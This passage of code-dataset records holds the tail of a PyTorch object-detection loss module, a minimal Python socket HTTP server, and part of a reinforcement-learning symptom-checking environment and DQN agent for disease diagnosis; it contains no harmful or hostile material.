#ideal_out[1,:4,y_grid,x_grid] = torch.tensor([x_off, y_off, box_coords[2], box_coords[3]])\r\n Sigmoid = nn.Sigmoid()\r\n\r\n #pred_xy = torch.mul((Sigmoid(outputs[i, :2, y_grid, x_grid]) + torch.tensor([x_grid, y_grid]).float().cuda()), torch.tensor([1.0, 1.0]).cuda())\r\n pred_xy = Sigmoid(outputs[i, (box_no*5):(box_no*5 + 2), y_grid, x_grid])\r\n actual_xy = torch.tensor([x_off, y_off]).cuda()\r\n #actual_xy = torch.tensor([(box_coords[0] * 640/20), (box_coords[1] * 480/15)]).cuda()\r\n xy_loss += l_coord* ((pred_xy-actual_xy)**2).sum()\r\n\r\n actual_wh = torch.tensor([(box_coords[2]), (box_coords[3])]).cuda()\r\n pred_wh = torch.mul((Sigmoid(outputs[i, (box_no*5 + 2):(box_no*5 + 4), y_grid, x_grid])), pwh)\r\n wh_loss += l_coord* ((pred_wh-actual_wh)**2).sum()\r\n \r\n ideal_out = torch.zeros(1, 3, outputs.size()[2], outputs.size()[3])\r\n ideal_out[0,box_no,y_grid,x_grid] = torch.tensor([1.0])\r\n ideal_out = ideal_out.cuda()\r\n bce_loss = nn.BCELoss()\r\n bce_loss_sum = nn.BCELoss(size_average =False)\r\n\r\n obj_loss += (1)*(bce_loss(Sigmoid(outputs[i,(box_no*5 + 4),y_grid,x_grid]),ideal_out[0,box_no,y_grid,x_grid])) \r\n for j in range(3):\r\n obj_loss += (l_noobj)*(bce_loss_sum(Sigmoid(outputs[i,(j*5 + 4),:,:]),ideal_out[0,j,:,:]))\r\n obj_loss -= (l_noobj)*bce_loss(Sigmoid(outputs[i,(box_no*5 + 4),y_grid,x_grid]),ideal_out[0,box_no,y_grid,x_grid])\r\n\r\n iou = 0.0\r\n for i in range(outputs.size()[0]):\r\n box_coords = labels[i]\r\n box_aspect = box_coords[3]/box_coords[2]\r\n if box_aspect <= 3/4.0:\r\n box_no = 0\r\n pwh = torch.tensor(pwhs[0]).cuda()\r\n elif box_aspect >= 4/3.0:\r\n box_no = 2\r\n pwh = torch.tensor(pwhs[2]).cuda()\r\n else:\r\n box_no = 1\r\n pwh = torch.tensor(pwhs[1]).cuda()\r\n in_box = input_to_box(labels[i])\r\n x_grid = torch.floor(box_coords[0]*outputs.size()[3])\r\n y_grid = torch.floor(box_coords[1]*outputs.size()[2])\r\n x_grid = x_grid.long()\r\n y_grid = y_grid.long()\r\n grid = [int(x_grid.item()), int(y_grid.item())]\r\n\r\n output = nn.Sigmoid()(outputs[i,box_no*5: (box_no*5+4),y_grid,x_grid])\r\n output[2:4] = torch.mul(output[2:4], pwh)\r\n out_box = output_to_box(grid, output)\r\n iou += get_iou(in_box, out_box)\r\n\r\n iou /= outputs.size()[0]\r\n xy_loss = xy_loss/(outputs.size()[0])\r\n wh_loss = wh_loss/(outputs.size()[0])\r\n obj_loss = obj_loss/(outputs.size()[0])\r\n\r\n loss = xy_loss + wh_loss + obj_loss\r\n #loss /= 10\r\n #loss = obj_loss\r\n if print_losses:\r\n print(f'xy loss : {xy_loss}, wh loss : {wh_loss}, obj loss : {obj_loss}')\r\n\r\n return loss, xy_loss, wh_loss, obj_loss, iou\r\n\r\n\r\nclass FocalLoss(nn.Module):\r\n def __init__(self, alpha=1, gamma=2, logits=False, reduce=True):\r\n super(FocalLoss, self).__init__()\r\n self.alpha = alpha\r\n self.gamma = gamma\r\n self.logits = logits\r\n self.reduce = reduce\r\n\r\n def forward(self, inputs, targets, iou):\r\n if self.logits:\r\n BCE_loss = F.binary_cross_entropy_with_logits(inputs, targets, reduce=False)\r\n else:\r\n BCE_loss = F.binary_cross_entropy(inputs, targets, reduce=False)\r\n pt = torch.exp(-BCE_loss)\r\n F_loss = self.alpha * (iou-pt)**self.gamma * BCE_loss\r\n\r\n if self.reduce:\r\n return torch.mean(F_loss)\r\n else:\r\n return torch.sum(F_loss)\r\n\r\ndef new_loss(outputs, labels, print_losses=False, verbose = False):\r\n # 8 X 5 X 15 X 20\r\n l_wh = 1\r\n l_xy = 1\r\n l_obj = 1\r\n l_noobj = 0.5\r\n\r\n \"\"\"[[270.29843406 301.07493206]\r\n [514.08074771 208.01640387]\r\n [550.88115632 386.20782774]]\"\"\"\r\n\r\n \"\"\"\r\n [[399.57132883 385.37886898]\r\n [377.97266881 202.91869545]\r\n [199.60422234 305.24078033]\r\n [560.06322625 218.35645933]\r\n [586.74791377 391.02851182]]\r\n\r\n \"\"\"\r\n pwhs = [[0.624, 0.80],[0.59, 0.423],[0.312, 0.636],[0.875, 0.455],[0.9168, 0.815]]\r\n #pwhs = [[0.422, 0.6272], [0.8,0.4333], [0.86,0.80]]\r\n\r\n loss = 0.0\r\n xy_loss = 0.0\r\n wh_loss = 0.0\r\n obj_loss = 0.0\r\n iou = 0.0\r\n #pwh = torch.tensor([4.0,3.0]).cuda()\r\n def anchor_iou(b1, b2):\r\n overlap = min(b1[0], b2[0])*min(b1[1], b2[1])\r\n total_area = b1[0]*b1[1] + b2[0]*b2[1]\r\n return overlap/(total_area-overlap)\r\n\r\n\r\n Sigmoid = nn.Sigmoid()\r\n focal_loss = FocalLoss(reduce = False)\r\n focal_loss_mean = FocalLoss(reduce = True)\r\n bce_loss = nn.BCELoss()\r\n bce_loss_mean = nn.BCELoss(size_average =True)\r\n\r\n l1loss = nn.L1Loss()\r\n\r\n for i in range(outputs.size()[0]):\r\n anchors = []\r\n anchors_ioupass = []\r\n box_coords = labels[i]\r\n max_iou = 0\r\n max_id = 0\r\n for j in range(len(pwhs)):\r\n iou_anch = anchor_iou([box_coords[2],box_coords[3]],pwhs[j])\r\n if iou_anch > max_iou:\r\n max_iou = iou_anch\r\n max_id = j\r\n if iou > 0.5:\r\n anchors_ioupass.append(j)\r\n \r\n #if len(anchors) == 0:\r\n anchors.append(max_id)\r\n\r\n if verbose:\r\n print(f' \\n\\n{box_coords}')\r\n\r\n def pred_iou(pred, target):\r\n if verbose:\r\n print(f'iou_coords {pred} , {target} ______')\r\n return get_iou_torch(pred, target)\r\n\r\n x_grid = torch.floor(box_coords[0]*outputs.size()[3])\r\n x_off = box_coords[0]*outputs.size()[3]-x_grid\r\n y_grid = torch.floor(box_coords[1]*outputs.size()[2])\r\n y_off = box_coords[1]*outputs.size()[2]-y_grid\r\n\r\n x_grid = x_grid.long()\r\n y_grid = y_grid.long()\r\n\r\n \r\n ideal_out = torch.zeros((len(pwhs), outputs.size()[2], outputs.size()[3])).cuda()\r\n \r\n for j in range(len(anchors)):\r\n box_no = anchors[j]\r\n pred_xy = outputs[i, (box_no*5):(box_no*5 + 2), y_grid, x_grid]\r\n actual_xy = torch.tensor([x_off, y_off]).cuda()\r\n actual_xy = torch.log((actual_xy)/(1-actual_xy) + 1e-6)\r\n actual_xy = torch.clamp(actual_xy, min=-4, max=4)\r\n if verbose:\r\n print(f'xy {pred_xy} , {actual_xy} ______')\r\n #xy_loss += ((pred_xy-actual_xy)**2).sum()/(len(anchors))\r\n xy_loss += F.binary_cross_entropy(pred_xy, actual_xy, reduce=False).sum()\r\n #xy_loss += F.binary_cross_entropy(pred_xy, actual_xy, reduce=True)/(len(anchors))\r\n\r\n pwh = torch.tensor(pwhs[box_no]).cuda()\r\n actual_wh = torch.log((torch.tensor([(box_coords[2]), (box_coords[3])]).cuda()/pwh))\r\n pred_wh = outputs[i, (box_no*5 + 2):(box_no*5 + 4), y_grid, x_grid]\r\n #pred_wh = torch.mul(((Sigmoid(outputs[i, (box_no*5 + 2):(box_no*5 + 4), y_grid, x_grid])*2)**2), pwh)\r\n #pred_wh = torch.mul((torch.exp(outputs[i, (box_no*5 + 2):(box_no*5 + 4), y_grid, x_grid])), pwh)\r\n if verbose:\r\n print(f'wh {pred_wh} , {actual_wh} ______')\r\n wh_loss += ((pred_wh-actual_wh)**2).sum()/(len(anchors))\r\n\r\n pred = [(Sigmoid(pred_xy[0])+x_grid.float())/outputs.size()[3], (Sigmoid(pred_xy[1])+y_grid.float())/outputs.size()[2], torch.exp(pred_wh[0])*pwh[0], torch.exp(pred_wh[1])*pwh[1]]\r\n pred = torch.tensor(pred).float().cuda()\r\n iou_pred = pred_iou(pred, box_coords)\r\n if verbose:\r\n print(f'iou {iou_pred} ______')\r\n iou += iou_pred /(len(anchors))\r\n ideal_out[box_no, y_grid, x_grid] = torch.tensor([iou_pred]).cuda()\r\n\r\n \r\n obj_loss += F.binary_cross_entropy(Sigmoid(outputs[i,[k*5 + 4 for k in range(len(pwhs))],:,:]), ideal_out, reduce=False).sum()\r\n for anch in anchors_ioupass:\r\n if anch not in anchors:\r\n obj_loss -= F.binary_cross_entropy(Sigmoid(outputs[i,anch*5 + 4,y_grid,x_grid]), torch.tensor([0.0]).cuda(), reduce=False).sum()\r\n obj_loss /= (outputs.size()[3]*outputs.size()[2])\r\n obj_loss += F.binary_cross_entropy(Sigmoid(outputs[i,[k*5 + 4 for k in anchors],y_grid,x_grid]), ideal_out[anchors,y_grid,x_grid], reduce=False).sum()\r\n\r\n # obj_loss += focal_loss(Sigmoid(outputs[i,[k*5 + 4 for k in range(len(pwhs))],:,:]), ideal_out, 0).sum()\r\n # for anch in anchors_ioupass:\r\n # if anch not in anchors:\r\n # obj_loss -= focal_loss(Sigmoid(outputs[i,anch*5 + 4,y_grid,x_grid]), torch.tensor([0.0]).cuda(), reduce=False).sum()\r\n # obj_loss /= (outputs.size()[3]*outputs.size()[2])\r\n # obj_loss += F.binary_cross_entropy(Sigmoid(outputs[i,[k*5 + 4 for k in anchors],y_grid,x_grid]), ideal_out[anchors,y_grid,x_grid], reduce=False).sum()\r\n\r\n iou = iou/outputs.size()[0]\r\n xy_loss = l_xy*xy_loss/(outputs.size()[0])\r\n wh_loss = l_wh*wh_loss/(outputs.size()[0])\r\n obj_loss = l_obj*obj_loss/(outputs.size()[0])\r\n\r\n loss = xy_loss + wh_loss + obj_loss\r\n\r\n if print_losses:\r\n print(f'xy loss : {xy_loss}, wh loss : {wh_loss}, obj loss : {obj_loss}, iou : {iou}')\r\n\r\n return loss, xy_loss, wh_loss, obj_loss, iou\r\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":11430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"566683890","text":"# coding:utf-8\n\nfrom multiprocessing import Process\nimport socket\n\n\nHTML_ROOT_DIR = ''\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind(('', 8000))\nserver_socket.listen(128)\n\n\ndef handle_client(client_socket):\n '''\n handle request from clients\n '''\n request_data = client_socket.recv(1024)\n\n # construct response\n response_start_line = 'HTTP/1.1 200 ok\\r\\n'\n response_header = 'Server: static_server\\r\\n'\n response_body = 'hello server'\n response = response_start_line + response_header + '\\r\\n' + response_body\n print(response)\n\n client_socket.send(bytes(response, 'utf-8'))\n\n client_socket.close()\n\n\ndef main():\n while True:\n client_socket, client_address = server_socket.accept()\n print('{} connected'.format(client_address))\n handle_client_process = Process(\n target=handle_client, args=(client_socket,))\n handle_client_process.start()\n client_socket.close()\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"static_server/static_web_server.py","file_name":"static_web_server.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"116952339","text":"import numpy as np\nimport random\nimport gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport torch\nimport torch.nn as nn\nfrom torch.nn.parameter import Parameter\nimport torch.nn.functional as F\nimport logging\n\nclass Simple_multiclass(nn.Module):\n def __init__(self, input_dim, embed_dim, output_dim, cls=3):\n super(Simple_multiclass, self).__init__()\n self.cls = cls\n self.propensity = nn.Sequential(\n nn.Linear(input_dim, embed_dim), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(embed_dim, embed_dim), \\\n nn.ReLU(inplace=True),\n nn.Linear(embed_dim, embed_dim), \\\n )\n self.classifier = nn.Sequential(\n nn.ReLU(inplace=True), \\\n nn.Linear(embed_dim, output_dim*cls)\n )\n \n def encode(self, x):\n return self.propensity(x)\n \n def forward(self, x):\n logits = self.classifier(self.encode(x)).view(x.shape[0], -1, self.cls)\n return logits\n \nclass Patient():\n def __init__(self, data_selfr, data_symp, data_dise, block_data, bg):\n self.selfrbase = data_selfr\n self.sympbase = data_symp\n self.disebase = data_dise\n self.block_data = block_data\n \n if bg == 'all':\n path = 'multiclassifier_prop_withtest_ori'\n else:\n path = 'multiclassifier_prop_ori'\n \n print(path)\n \n self.classifier = Simple_multiclass(66+4, 32, 66).cuda() \n self.classifier.load_state_dict(torch.load('checkpoints/new_exp_models/classifier/'+path))\n# self.reset_iterative()\n \n def _printf(self, sym_id, state):\n response_dict = {-1: \"I don't have %s\", 0: \"I'm not sure about %s\", 1: \"I have %s\"}\n print(response_dict[state]%(sym_list[sym_id]),sym_id)\n \n def report(self, rep):\n mask_poses = np.argwhere(rep != 0).reshape(-1)\n for mask_pos in mask_poses:\n self._printf(mask_pos, rep[mask_pos])\n \n def answer(self, query, verbose=False):\n if verbose: self.printf(query, self.state[0, query])\n return self.state[0, query]\n \n def sample(self, k = None, np_random=np.random):\n input_sample = np.concatenate([self.state, np.eye(4).astype(np.float32)[self.dise]], -1)\n pool_mask = self.pool*self.mask\n pool_sample = np.concatenate([pool_mask, np.eye(4).astype(np.float32)[self.disebase[self.indexes]]], -1)\n \n all_the_same = np.all(input_sample == pool_sample)\n \n if not all_the_same:\n input_sample_batch = np.concatenate([input_sample, pool_sample], 0)\n with torch.no_grad():\n prop_sample_batch = self.classifier.encode(torch.from_numpy(input_sample_batch).cuda())\n# distance = torch.sqrt(((prop_sample_batch[0]-prop_sample_batch[1:])**2/prop_sample_batch[1:].var(0)).sum(-1))\n distance = ((prop_sample_batch[0]-prop_sample_batch[1:])**2/prop_sample_batch[1:].var(0)).sum(-1)\n similarity = torch.nn.functional.softmax(-distance, -1).data.cpu().numpy()\n else:\n similarity = np.ones(pool_sample.shape[0])/pool_sample.shape[0]\n \n prop_ori = (np.eye(3)[self.pool.astype(np.int)+1] * similarity[:, None, None]).sum(0)\n prop = prop_ori[:, [0, 2]]\n prop_sum = prop.sum(1)\n unknown_pos = np.argwhere(prop_sum == 0)\n prop[unknown_pos] = 0.5\n prop = prop/prop.sum(1, keepdims=True)\n\n new_state = np_random.binomial(1, p = prop[:, 1], size=(1, 66))*2-1\n new_state[:, unknown_pos] = 0\n \n return new_state if k is None else new_state[0, k]\n \n def reset_iterative(self, id, np_random=np.random):\n self.id = id\n self.selfr = self.selfrbase[[self.id]]\n self.mask = self.selfr != 0\n if self.mask.sum() != 0:\n known_idx = np.argwhere(self.mask[0]).reshape(-1)\n known_idx = np_random.choice(known_idx, size = len(known_idx), replace=True)\n self.mask = np.zeros_like(self.selfr).astype(np.float32)\n self.mask[:, known_idx] = 1\n self.selfr = self.selfr*self.mask\n\n self.dise = self.disebase[[self.id]]\n self.state = np.array(self.selfr)\n self.indexes = self.disebase == self.dise[0]\n self.pool = self.sympbase[self.indexes]\n \n unknown = np.argwhere(self.mask[0] == 0) # this requires direction of symptom effect\n for unknown_pos in unknown:\n self.state[0, unknown_pos] = self.sample(unknown_pos, np_random=np_random)\n self.mask[0, unknown_pos] = 1\n \n \n def reset(self, id, np_random=np.random, allow_rep=False, exact=False):\n self.id = id\n \n resamp = True\n while resamp:\n resamp = False\n \n self.selfr = self.selfrbase[[self.id]]\n self.mask = self.selfr != 0\n if self.mask.sum() != 0 and not exact:\n known_idx = np.argwhere(self.mask[0]).reshape(-1)\n known_idx = np_random.choice(known_idx, size = len(known_idx), replace=True)\n self.mask = np.zeros_like(self.selfr).astype(np.float32)\n self.mask[:, known_idx] = 1\n self.selfr = self.selfr*self.mask\n\n self.dise = self.disebase[[self.id]]\n \n self.state = np.array(self.sympbase[[self.id]])\n if not exact:\n mask = np_random.randint(2, size=self.state.shape).astype(np.float32)\n self.state = self.state * mask\n self.state[self.selfr!=0] = self.selfr[self.selfr!=0]\n\n self.indexes = self.disebase == self.dise[0]\n self.pool = self.sympbase[self.indexes]\n\n self.mask = self.state != 0\n\n new_state = self.sample(np_random=np_random)\n self.state = new_state*(1-self.mask)+self.state*self.mask\n \n self.in_block_data = np.any(np.all(self.state == self.block_data, -1))\n \n if allow_rep and self.in_block_data:\n resamp = True\n\n \nclass MuzhiEnv():\n metadata = {'render.modes': ['human'], 'unknown':0, 'positive':1, 'negative':-1}\n \n def __init__(self, data_bg, mode='train', tol=11):\n with open('split_data/goal_dict_all_block.p', 'rb') as fhand:\n import pickle\n self.goal_dicts = pickle.load(fhand)\n fhand.close()\n \n with open('split_data/slot_set.txt', 'r') as fhand:\n self.sym_list = fhand.readlines()\n self.sym_list = [sym.strip() for sym in self.sym_list]\n fhand.close()\n \n with open('split_data/diseases.txt', 'r') as fhand:\n self.dise_list = fhand.readlines()\n self.dise_list = [dise.strip() for dise in self.dise_list]\n fhand.close()\n \n self.tol = tol\n self.mode = mode\n self.user_id = -1\n \n self.goals = self.goal_dicts[data_bg]\n \n data_symp = np.zeros((len(self.goals), len(self.sym_list)), dtype=np.float32)\n data_selfr = np.zeros((len(self.goals), len(self.sym_list)), dtype=np.float32)\n data_dise = np.zeros(len(self.goals), dtype=np.int)\n\n for i in range(len(self.goals)):\n c_goal = self.goals[i]\n for slot in c_goal['implicit_inform_slots']:\n data_symp[i][self.sym_list.index(slot)] = 1 if c_goal['implicit_inform_slots'][slot] else -1\n for slot in c_goal['explicit_inform_slots']:\n data_symp[i][self.sym_list.index(slot)] = 1 if c_goal['explicit_inform_slots'][slot] else -1\n data_selfr[i][self.sym_list.index(slot)] = 1 if c_goal['explicit_inform_slots'][slot] else -1\n data_dise[i] = self.dise_list.index(c_goal['disease_tag'])\n \n \n block_data_name = 'test_data_bgall'\n data_symp_block = np.zeros((len(self.goal_dicts[block_data_name]), len(self.sym_list)), dtype=np.float32)\n \n \n for i in range(len(self.goal_dicts[block_data_name])):\n c_goal = self.goal_dicts[block_data_name][i]\n for slot in c_goal['implicit_inform_slots']:\n data_symp_block[i][self.sym_list.index(slot)] = 1 if c_goal['implicit_inform_slots'][slot] else -1\n for slot in c_goal['explicit_inform_slots']:\n data_symp_block[i][self.sym_list.index(slot)] = 1 if c_goal['explicit_inform_slots'][slot] else -1\n \n self.patient = Patient(data_symp=data_symp, data_selfr=data_selfr, data_dise=data_dise, block_data = data_symp_block, bg=data_bg)\n self.seed()\n self.reset()\n \n def seed(self, seed=None):\n from gym.utils import seeding\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n \n def rewarding(self, info):\n if 'success' in info:\n return 10 if info['success'] else -100\n if 'repeat' in info:\n if info['repeat']:\n return -88\n else:\n return 0\n \n def step(self, action, verbose=False):\n assert self.done is False, \"It's game over now.\"\n info = {}\n reward = None\n \n if action < len(self.dise_list):\n self.done = True\n info['success'] = (action == self.dise)\n info['hit'] = (action == self.dise)\n else:\n action = action - len(self.dise_list)\n info['repeat'] = (self.have_visit[action] != 0)\n if not info['repeat']:\n self.obs[action] = self.state[action]\n self.have_visit[action] = 1.\n info['hit'] = (self.state[action] != self.metadata['unknown'])\n \n if verbose: print(\"%d %s\"%(self.state[action], self.sym_list[action]))\n self.runs += 1\n \n \n if self.runs >= self.tol and not self.done:\n info['leave'] = True\n info['success'] = False\n self.done = True\n \n reward = self.rewarding(info)\n assert reward is not None, \"You shoud design a reward for %s\"%(str(info))\n \n info['runs'] = self.runs\n return np.array(np.hstack((self.obs, self.have_visit))), reward, self.done, info\n \n def reset(self, verbose=False, allow_rep=False):\n self.runs = 0\n self.done = False\n if self.mode == 'train':\n self.user_id = self.np_random.randint(len(self.goals))\n elif self.mode == 'test':\n self.user_id = (self.user_id + 1)%len(self.goals)\n \n if self.mode == 'train':\n self.patient.reset(id=self.user_id, np_random=self.np_random, allow_rep=allow_rep) \n\n self.state = self.patient.state[0]\n self.obs = self.patient.selfr[0]\n self.dise = self.patient.dise[0]\n \n elif self.mode == 'test':\n selfr = self.patient.selfrbase[self.user_id]\n self.obs = np.array(selfr)\n state = self.patient.sympbase[self.user_id]\n self.state = np.array(state)\n self.dise = self.patient.disebase[self.user_id]\n \n \n self.have_visit = (self.obs != 0).astype(np.float32)\n\n if verbose: print(np.array(self.sym_list)[self.have_visit==1], self.dise_list[self.dise])\n return np.array(np.hstack((self.obs, self.have_visit)))\n \n def render(self, mode='human', close=False):\n return np.array(np.hstack((self.obs, self.have_visit))) \n\n\n\nclass Simple_classifier(nn.Module):\n def __init__(self, input_dim, embed_dim, output_dim):\n super(Simple_classifier, self).__init__()\n self.propensity = nn.Sequential(\n nn.Linear(input_dim, embed_dim*8), \\\n nn.LeakyReLU(0.1, inplace=True), \\\n nn.Linear(embed_dim*8, embed_dim), \\\n# nn.Softmax(-1), \\\n )\n self.classfier = nn.Sequential(\n nn.ReLU(inplace=True), \\\n nn.Linear(embed_dim, output_dim) \\\n )\n def encode(self, x):\n return self.propensity(x)\n \n def forward(self, x):\n logits = self.classfier(self.propensity(x))\n return logits\n\n\nclass DQN(nn.Module):\n def __init__(self, input_shape, hidden_size, num_actions, dueling=False):\n super(DQN, self).__init__()\n\n self.input_shape = input_shape\n self.num_actions = num_actions\n self.hidden_size = hidden_size\n self.dueling = dueling\n\n if self.dueling:\n self.model_obs = nn.Sequential(nn.Linear(input_shape, self.hidden_size), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(self.hidden_size, self.hidden_size), \\\n nn.ReLU(inplace=True))\n\n self.model_adv = nn.Sequential(nn.Linear(self.hidden_size, self.hidden_size), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(self.hidden_size, num_actions))\n\n self.model_val = nn.Sequential(nn.Linear(self.hidden_size, self.hidden_size), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(self.hidden_size, 1))\n else:\n self.model_obs = nn.Sequential(nn.Linear(input_shape, self.hidden_size), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(self.hidden_size, self.hidden_size), \\\n nn.ReLU(inplace=True), \\\n nn.Linear(self.hidden_size, self.num_actions))\n\n def forward(self, x):\n if self.dueling:\n feat = self.model_obs(x)\n adv = self.model_adv(feat)\n val = self.model_val(feat)\n\n out = val+adv-adv.mean(1, keepdim=True)\n else:\n out = self.model_obs(x)\n\n return out-x[:, self.num_actions:self.num_actions*2]*1000000\n\n def soft_update(self, state_dict, ratio = 0.9):\n model_dict = self.state_dict()\n for key in model_dict:\n model_dict[key].copy_(model_dict[key]*ratio+state_dict[key]*(1-ratio))\n self.load_state_dict(model_dict)\n\nclass ExperienceReplayMemory:\n def __init__(self, capacity, memory_type):\n self.capacity = capacity\n self.memory_type = memory_type\n self.buffer = []\n\n def push(self, s, a, r, d, s_):\n transition = np.hstack((s, [a, r, d], s_))\n self.buffer.append(transition)\n if len(self.buffer) > self.capacity:\n if self.memory_type == \"list\":\n del self.buffer[0]\n elif self.memory_type == \"random\":\n del self.buffer[np.random.randint(self.capacity)]\n\n def sample(self, batch_size):\n return random.sample(self.buffer, batch_size)\n\n def __len__(self):\n return len(self.buffer)\n \n def full(self):\n return len(self.buffer) == self.capacity\n\nclass ExperienceMemory:\n def __init__(self, capacity, memory_type):\n self.capacity = capacity\n self.memory_type = memory_type\n self.input_buffer = []\n self.label_buffer = []\n \n\n def push(self, input, label):\n self.input_buffer.append(input)\n self.label_buffer.append(label)\n \n if len(self.input_buffer) > self.capacity:\n if self.memory_type == \"list\":\n del self.input_buffer[0]\n del self.label_buffer[0]\n elif self.memory_type == \"random\":\n index = np.random.randint(self.capacity)\n del self.input_buffer[index]\n del self.label_buffer[index]\n\n def sample(self, batch_size):\n indexes = np.arange(len(self.input_buffer))\n indexes = np.random.choice(indexes, batch_size, replace=True)\n return np.array([self.input_buffer[index] for index in indexes]), np.array([self.label_buffer[index] for index in indexes])\n\n def __len__(self):\n return len(self.input_buffer)\n \n def full(self):\n return len(self.input_buffer) == self.capacity\n \n def erase(self):\n del self.input_buffer\n del self.label_buffer\n self.input_buffer = []\n self.label_buffer = []\n\nclass Agent(nn.Module):\n def __init__(self, state_len, action_len, dise_len, emb_len, params):\n super(Agent, self).__init__()\n self.state_len = state_len\n self.action_len = action_len\n self.dise_len = dise_len\n self.emb_len = emb_len\n self.conf_threshold = params['conf_threshold']\n self.device = params['device']\n self.random_start = params['random_start']\n self.num_bootstrap = params['num_bootstrap']\n self.dise_index = torch.arange(dise_len)[None, :, None].to(self.device)\n \n self.reclassifier = Simple_multiclass(66, 32, 66).cuda()\n self.optimizer_reclassifier = torch.optim.Adam(self.reclassifier.parameters(), lr = 1e-3)\n \n self.classifier3 = []\n self.optimizer_classifier3 = []\n for i in range(self.num_bootstrap):\n self.classifier3.append(Simple_classifier(66, 8, 4).cuda())\n self.optimizer_classifier3.append(torch.optim.Adam(self.classifier3[i].parameters(), lr = 1e-3))\n \n self.classifier3_module = nn.ModuleList(self.classifier3)#+self.optimizer_classifier3)\n \n self.model = DQN(state_len, 128, self.action_len, params['dueling'])\n self.target_model = DQN(state_len, 128, self.action_len, params['dueling'])\n self.target_model.load_state_dict(self.model.state_dict())\n \n self.params = params\n self.batch_size = params['batch_size']\n self.memory_size = params['memory_size']\n self.memory = ExperienceReplayMemory(capacity=self.memory_size, memory_type=params['memory_type'])\n self.memory_checker = ExperienceMemory(capacity=self.batch_size*40, memory_type=params['memory_type'])\n self.gamma = params['gamma']\n self.epsilon = params['epsilon']\n self.target_update_freq = params['target_update_freq']\n self.elim_update_freq = params['elim_update_freq']\n self.soft_ratio = params['soft_ratio']\n \n self.learn_step_counter = 0\n \n self.criterion = nn.MSELoss()\n self.criterion_class = nn.CrossEntropyLoss()\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr = params['lr'])\n self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, params['update_steps'])\n \n \n def cal_prop_uncertainty(self, input_data, mask, sample_num = 1):\n samples = input_data\n props = []\n for i in range(self.num_bootstrap):\n props.append(torch.nn.functional.softmax(self.classifier3[i](samples), -1).view(-1, 1, 4))\n props = torch.cat(props, 1)\n# print(props.shape)\n return props.mean(1), props.std(1)\n \n def predict(self, s_t):\n with torch.no_grad():\n pre_dises = []\n for i in range(self.num_bootstrap):\n pre_dises.append(torch.nn.functional.softmax(self.checker_model[i](s_t[:, :self.action_len*2]), -1)[:, :, None])\n pre_dises = torch.cat(pre_dises, -1)\n confs = pre_dises.mean(-1)\n guess_dise = confs.max(-1, keepdim=True)[1]\n \n return guess_dise, confs\n \n def new_state(self, s_t, verbose=False):\n with torch.no_grad():\n prop_mean, prop_std = self.cal_prop_uncertainty(s_t[:, :66], s_t[:, 66:132], sample_num=50)\n prop_mean_maxval, prop_mean_maxind = prop_mean.max(1, keepdim=True)\n \n if verbose: print(\"Possible disease: %s, conf: %f\"%(patience.dise_list[int(prop_mean_maxind.item())],\\\n prop_mean_maxval.item()))\n s_t = torch.cat((s_t, prop_mean), 1)\n return s_t, prop_mean, prop_std\n \n def final_action(self, s_t, act_ind, prop_mean, prop_std, verbose=False):\n prop_mean_future = prop_mean + prop_std*3\n prop_mean_maxval, prop_mean_maxind = prop_mean.max(1, keepdim=True)\n number = (prop_mean_future >= prop_mean_maxval).float().sum().item()\n \n if verbose:\n print(\"guess_confs is %s, future_confs is %s, number is %f\"%(prop_mean[0].cpu().data.numpy(), prop_mean_future[0].cpu().data.numpy(), number))\n \n if number > 1:\n if verbose:\n print(\"Have better choice.\")\n return act_ind + self.dise_len\n else:\n if verbose:\n print(\"No better choice.\")\n return prop_mean_maxind[0].item()\n \n def choose_action(self, s_t, prop_mean, prop_std, test=False, verbose=False):\n with torch.no_grad():\n a_val = self.model(s_t)\n if (np.random.uniform() < self.epsilon or self.learn_step_counter < 1000) and not test:\n a = np.random.choice(np.argwhere(s_t[0, self.action_len:self.action_len*2].cpu().data.numpy() == 0).reshape(-1))\n if verbose: print(\"Choose symptom randomly: \", patience.sym_list[a])\n else:\n a = a_val.max(1)[1].view(-1).item()\n if verbose:\n print(\"Choose symptom: \", patience.sym_list[a])\n# print(\"q values: \", a_val[0].cpu().data.numpy(), \" id: \", a)\n assert s_t[0, self.action_len+a].item() == 0, \"q values: %s id: %d\"%(a_val[0].cpu().data.numpy(), a)\n if verbose: print(\"Q values examples %s\"%(a_val[0].cpu().data.numpy()[:5]))\n \n a_ = self.final_action(s_t, a, prop_mean, prop_std, verbose = verbose)\n \n return a_, a\n \n def forward(self, s_t, verbose=False):\n return self.model(s_t)\n \n def compute_loss(self, s_t, act, rew, done, s_tplus1):\n q_vals = self.model(s_t)\n q_val = q_vals.gather(1, act) # because r is for act\n with torch.no_grad():\n q_vals_next = self.model(s_tplus1)\n q_vals_targ = rew + (1-done)*self.gamma*(q_vals_next.detach().max(1)[0].view(-1, 1)) # how about done?\n \n loss = self.criterion(q_val, q_vals_targ.detach())\n return loss\n \n def learn(self, batch_size):\n if (self.learn_step_counter % self.target_update_freq == 0):\n# print(\"Updating ... \")\n self.target_model.soft_update(self.model.state_dict(), self.soft_ratio)\n \n self.learn_step_counter += 1\n \n batch_trans = np.array(self.memory.sample(batch_size=batch_size))\n st, en = 0, self.state_len\n batch_s = torch.FloatTensor(batch_trans[:, st:en]).to(self.params['device'])\n st, en = en, en+1\n batch_a = torch.LongTensor(batch_trans[:, st:en].astype(np.int)).to(self.params['device'])\n st, en = en, en+1\n batch_r = torch.FloatTensor(batch_trans[:, st:en]).to(self.params['device'])\n st, en = en, en+1\n batch_d = torch.FloatTensor(batch_trans[:, st:en]).to(self.params['device'])\n st, en = en, en+self.state_len\n batch_s_ = torch.FloatTensor(batch_trans[:, st:]).to(self.params['device'])\n \n 